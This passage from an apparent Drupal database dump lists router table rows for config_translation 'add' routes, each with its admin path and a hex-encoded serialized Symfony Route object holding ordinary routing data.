3b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f6f766572766965772f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313937333b733a31343a227061747465726e4f75746c696e65223b733a36383a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a31313b7d7d, 11),
('config_translation.item.add.entity.field_config.user_field_edit_form', '/admin/config/people/accounts/fields/{field_config}/translate/{langcode}/add', '/admin/config/people/accounts/fields/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31313a22757365725f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a226669656c645f636f6e666967223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130333a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a226669656c645f636f6e666967223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.filter_format.edit_form', '/admin/config/content/formats/manage/{filter_format}/translate/{langcode}/add', '/admin/config/content/formats/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f7b66696c7465725f666f726d61747d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31333a2266696c7465725f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a2266696c7465725f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130343a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a2266696c7465725f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.image_style.edit_form', '/admin/config/media/image-styles/manage/{image_style}/translate/{langcode}/add', '/admin/config/media/image-styles/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37383a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31313a22696d6167655f7374796c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130363a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.media_type.edit_form', '/admin/structure/media/manage/{media_type}/translate/{langcode}/add', '/admin/structure/media/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36373a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31303a226d656469615f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.menu.edit_form', '/admin/structure/menu/manage/{menu}/translate/{langcode}/add', '/admin/structure/menu/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a343a226d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226d656e75223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38373a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a226d656e75223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.node_type.edit_form', '/admin/structure/types/manage/{node_type}/translate/{langcode}/add', '/admin/structure/types/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36363a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a393a226e6f64655f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39333a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.pathauto_pattern.edit_form', '/admin/config/search/path/patterns/{pathauto_pattern}/translate/{langcode}/add', '/admin/config/search/path/patterns/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37383a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31363a22706174686175746f5f7061747465726e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22706174686175746f5f7061747465726e223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130353a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22706174686175746f5f7061747465726e223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.search_page.edit_form', '/admin/config/search/pages/manage/{search_page}/translate/{langcode}/add', '/admin/config/search/pages/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37323a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31313a227365617263685f70616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a227365617263685f70616765223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39393a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a227365617263685f70616765223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f